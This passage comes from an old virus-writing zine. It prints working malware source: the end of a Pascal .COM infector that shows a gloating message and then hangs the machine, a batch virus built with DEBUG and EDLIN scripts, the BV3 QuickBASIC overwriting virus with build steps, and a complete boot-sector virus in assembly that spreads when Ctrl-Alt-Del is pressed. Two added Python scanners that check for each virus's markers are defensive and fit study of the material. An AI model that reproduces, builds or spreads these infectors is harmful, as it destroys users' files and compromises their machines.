BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(' '); {Give a lot of smiles}
Writeln(' ');
Writeln(' ');
Writeln(' ATTENTION: ');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' collecting and executing files, you have accidentally H??K? ');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' be; YES, it CAN be, a ????s has infected your system. Now what do ');
Writeln(' you have to say about that? HAHAHAHA. Have H?? with this one and ');
Writeln(' remember, there is NO cure for ');
Writeln(' ');
Writeln(' ?????????? ???????????? ??????????? ?????????? ');
Writeln(' ???????????? ???????????? ???????????? ???????????? ');
Writeln(' ???? ??? ??? ??? ??? ???? ?? ');
Writeln(' ??? ??? ??? ??? ??? ??? ');
Writeln(' ????????????? ??? ??? ??? ???????????? ');
Writeln(' ????????????? ??? ??? ??? ???????????? ');
Writeln(' ??? ??? ??? ??? ??? ??? ');
Writeln(' ??? ??? ??? ??? ???? ?? ???? ');
Writeln(' ??? ??? ???????????? ????????????? ???????????? ');
Writeln(' ?? ?? ???????????? ??????????? ?????????? ');
Writeln(' ');
Writeln(' ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

{ Although this is a primitive virus, it's effective. }
{ In this virus only the .COM files are infected. }
{ It's about 13K and it will change the file's }
{ date entry. }
[2.7]

Batch Viruses
-------------

Whoever thought that viruses could be in a BATCH file? This virus, which we
are about to see, makes use of the MS-DOS operating system. This BATCH virus
uses the DEBUG and EDLIN programs.

Name: VR.BAT

echo = off ( Self explanatory )
ctty nul ( This is important. Console output is turned off )
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written to "ind", name entries ONLY )

edlin ind<1 ( "ind" is processed with EDLIN so only file names appear )
debug ind<2 ( New batch program is created with DEBUG )
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN )
ctty con ( Console interface is assigned again )
name ( Newly created NAME.BAT is called )

In addition to this batch file, there are three command files, here named 1, 2 and 3.

Here is the first command file:
-------------------------------
Name: 1

1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000 (First program name is moved to the F000H address to save)

e108 ".BAT" (Extension of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in front of extension)
e110 0d,0a (Carriage return + line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )

The third command file must be printed as a hex dump because it contains
two control characters (1Ah = Control-Z), which are not printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .

In order for this virus to work, VR.BAT must be in the root directory. This program
only affects .COM files.
[2.8]

Viruses in Basic
----------------

Basic is a great language, and people often think of it as a limited language
that will not be of any use in creating something like a virus. Well, you are
really wrong. Let's take a look at a Basic virus created by R. Burger in 1987.
This program is an overwriting virus and uses MS-DOS (via SHELL) to infect .EXE
files. To do this you must compile the source code using Microsoft
QuickBASIC. Note the length of the compiled and linked .EXE file and edit
the source code to place the length of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the length of the linked
program, and remember to use the /e parameter when compiling.


10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END

This Basic virus will only attack .EXE files. After the execution you will
see an "INH" file, which contains the directory listing, and the file %SORT.EXE.
Programs whose names start with "%" are NOT infected; they are the backup copies.
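The three file-based viruses above each leave a recognizable trace on disk: the AIDS program stores its Warning string (a Turbo Pascal String[42], length byte first) at offset $80 of an infected .COM; the batch virus leaves a generated NAME.BAT containing COPY \VR.BAT lines; BV3 creates a "%"-prefixed backup and appends the quoted backup name to the infected .EXE. The following scanner is an added example, not code from the zine or from the virus authors, that checks a directory for those three traces. The sample files it builds are constructed stand-ins holding only the markers, and the BV3 tail check is my reading of lines 480 to 580 of the BASIC listing.

```python
"""Scanner for the infection markers the three listings above leave behind.

Added example (not from the zine): looks for the AIDS .COM marker, the
NAME.BAT residue of the batch virus, and the "%" backup/marker of BV3.
"""
import tempfile
from pathlib import Path

# Marker strings taken from the listings above.
AIDS_MARKER = b"This File Has Been Infected By AIDS! HaHa!"  # the Warning constant
AIDS_OFFSET = 0x80                 # MarkInfected sits at CS:$180 -> offset $80 in a .COM
VR_BAT_RESIDUE = b"COPY \\VR.BAT"  # written into NAME.BAT by command file 2
BV3_PREFIX = "%"                   # BV3 names its backup copy with a leading "%"


def has_aids_marker(data: bytes) -> bool:
    """AIDS stores Warning as a Pascal String[42]: length byte 42 then 42 chars,
    43 bytes in all (the Move(Buffer[$80], TestID, 43) in the listing)."""
    field = data[AIDS_OFFSET:AIDS_OFFSET + 43]
    return len(field) == 43 and field[0] == 42 and field[1:] == AIDS_MARKER


def has_vr_bat_residue(data: bytes) -> bool:
    """NAME.BAT built by the batch virus holds 'DEL x.COM' then 'COPY \\VR.BAT x.BAT'."""
    return VR_BAT_RESIDUE in data.upper()


def has_bv3_marker(data: bytes, name: str) -> bool:
    """BV3 lines 570-580 append WRITE#1,ORIGINALS$ to the infected .EXE, i.e. the
    quoted backup name ("%" + name without its first char) followed by CR LF."""
    marker = ('"' + BV3_PREFIX + name[1:].upper() + '"').encode()
    return data.rstrip(b"\r\n").upper().endswith(marker)


def scan_directory(root) -> dict:
    """Return the file names in `root` that carry each marker."""
    findings = {"aids_com": [], "vr_bat": [], "bv3_backup": [], "bv3_exe": []}
    for path in sorted(Path(root).iterdir()):
        if not path.is_file():
            continue
        name, data = path.name, path.read_bytes()
        upper = name.upper()
        if upper.endswith(".COM") and has_aids_marker(data):
            findings["aids_com"].append(name)
        if upper.endswith(".BAT") and has_vr_bat_residue(data):
            findings["vr_bat"].append(name)
        if name.startswith(BV3_PREFIX):
            findings["bv3_backup"].append(name)
        elif upper.endswith(".EXE") and has_bv3_marker(data, name):
            findings["bv3_exe"].append(name)
    return findings


def build_sample_dir(root) -> None:
    """Constructed sample files (no virus code), carrying only the markers."""
    root = Path(root)
    (root / "CLEAN.COM").write_bytes(b"\x90" * 300)
    sick = bytearray(b"\x90" * 300)
    sick[AIDS_OFFSET:AIDS_OFFSET + 43] = bytes([42]) + AIDS_MARKER
    (root / "SICK.COM").write_bytes(bytes(sick))
    (root / "NAME.BAT").write_bytes(b"DEL TEST.COM\r\nCOPY \\VR.BAT TEST.BAT\r\n")
    (root / "%ORT.EXE").write_bytes(b"MZ" + b"\x00" * 100)
    (root / "SORT.EXE").write_bytes(b"MZ" + b"\x00" * 100 + b'"%ORT.EXE"\r\n')
    (root / "OTHER.EXE").write_bytes(b"MZ" + b"\x00" * 100)


def demo() -> dict:
    """Build the constructed samples in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_dir(tmp)
        return scan_directory(tmp)


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind:11s}: {names}")
```

The AIDS check is exact about the offset and the Pascal length byte, because that is what the virus itself compares before deciding whether to overwrite a file; a looser substring search would also catch the marker if a later variant moved it.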
[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infects the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; itself in upper memory, this virus does not work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with an NOP and then assemble it, then debug that ;
; part of the code and place POP CS in place of NOP at that section. ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VECTOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
POP CS
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2

COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
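The header comments above give a defender two concrete facts: the original boot sector is parked at track 39, head 0, sector 8, and that address was picked because it exists on every 5.25" format (head 1 / sector 9 does not exist on single-sided or 8-sector disks). The following checker is an added example, not part of the zine or of the virus, that turns those facts into a test on a raw floppy image: it computes the byte offset of the parked sector from the disk geometry and flags the image when a DOS-looking boot sector sits there that is no longer the one in sector 0, which is what "looking at the boot sector" with a disk editor amounts to. The boot-sector heuristic (a leading JMP plus the 55 AA signature) and the sample images are my assumptions and constructions; the "infected" sample only simulates the relocation with an inert stand-in sector, not with any virus code.

```python
"""Floppy-image check for the relocated boot sector described in the comments above.

Added example (not from the zine): locate track 39 / head 0 / sector 8 in a raw
image and flag the disk if a DOS boot sector is parked there that differs from
sector 0. All sample images are constructed here.
"""
SECTOR = 512
STASH_CHS = (39, 0, 8)  # track 39, head 0, sector 8 (from the listing's comments)
# (cylinders, heads, sectors per track) of the classic 5.25" PC formats
GEOMETRIES = {"160K": (40, 1, 8), "180K": (40, 1, 9), "320K": (40, 2, 8), "360K": (40, 2, 9)}


def chs_to_offset(cyl: int, head: int, sector: int, heads: int, spt: int) -> int:
    """Byte offset of a CHS address in a raw image (sector numbers are 1-based)."""
    return ((cyl * heads + head) * spt + (sector - 1)) * SECTOR


def reachable(chs: tuple, geometry: tuple) -> bool:
    """True if the CHS address exists on a disk of that geometry."""
    cyl, head, sector = chs
    cyls, heads, spt = geometry
    return cyl < cyls and head < heads and 1 <= sector <= spt


def stash_location_by_format() -> dict:
    """Per format: (head 0/sector 8 exists, head 1/sector 9 exists)."""
    return {name: (reachable(STASH_CHS, g), reachable((39, 1, 9), g))
            for name, g in GEOMETRIES.items()}


def looks_like_dos_boot(sec: bytes) -> bool:
    """Heuristic (assumption): starts with a JMP and ends with the 55 AA signature."""
    return len(sec) == SECTOR and sec[0] in (0xEB, 0xE9) and sec[-2:] == b"\x55\xAA"


def analyse_image(image: bytes, heads: int, spt: int) -> dict:
    """Compare sector 0 with the parked sector and report a verdict."""
    boot = image[:SECTOR]
    off = chs_to_offset(*STASH_CHS, heads, spt)
    stash = image[off:off + SECTOR]
    parked = looks_like_dos_boot(stash) and stash != boot
    return {
        "boot_sector_looks_valid": looks_like_dos_boot(boot),
        "parked_boot_sector_found": parked,
        "verdict": "boot sector relocated, disk likely infected" if parked
                   else "no parked boot sector",
    }


def make_clean_image(geometry: tuple) -> bytes:
    """Constructed image: a stand-in DOS boot sector, then format fill (F6)."""
    cyls, heads, spt = geometry
    boot = bytearray(b"\xEB\x3C\x90" + b"SAMPLE  ")  # JMP short + OEM name (constructed)
    boot += b"\x00" * (SECTOR - len(boot) - 2) + b"\x55\xAA"
    return bytes(boot) + b"\xF6" * (cyls * heads * spt * SECTOR - SECTOR)


def make_relocated_image(clean: bytes, heads: int, spt: int) -> bytes:
    """Simulate only the relocation: original boot sector parked at track 39/head 0/
    sector 8, sector 0 replaced by an inert stand-in (CLI; JMP $), not virus code."""
    img = bytearray(clean)
    off = chs_to_offset(*STASH_CHS, heads, spt)
    img[off:off + SECTOR] = clean[:SECTOR]
    img[:SECTOR] = b"\xFA\xEB\xFE" + b"\x00" * (SECTOR - 3)
    return bytes(img)


def demo() -> dict:
    """Analyse a constructed clean and a constructed relocated 360K image."""
    cyls, heads, spt = GEOMETRIES["360K"]
    clean = make_clean_image(GEOMETRIES["360K"])
    relocated = make_relocated_image(clean, heads, spt)
    return {"clean": analyse_image(clean, heads, spt),
            "relocated": analyse_image(relocated, heads, spt),
            "stash_offset": chs_to_offset(*STASH_CHS, heads, spt)}


if __name__ == "__main__":
    for fmt, (h0s8, h1s9) in stash_location_by_format().items():
        print(f"{fmt}: head0/sector8 exists={h0s8}, head1/sector9 exists={h1s9}")
    for name, result in demo().items():
        print(name, result)
```

On a 360K disk the parked sector lives at LBA 709, byte offset 363008; on a 160K single-sided disk the same CHS address is LBA 319, which is why the comment says the choice is "common to all floppy formats". Because the virus does not mark track 39 bad in the FAT, a clean disk whose file data happens to occupy that sector will not look like a boot sector there, so the heuristic stays quiet, while a disk on which the original boot sector has been parked triggers it.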



 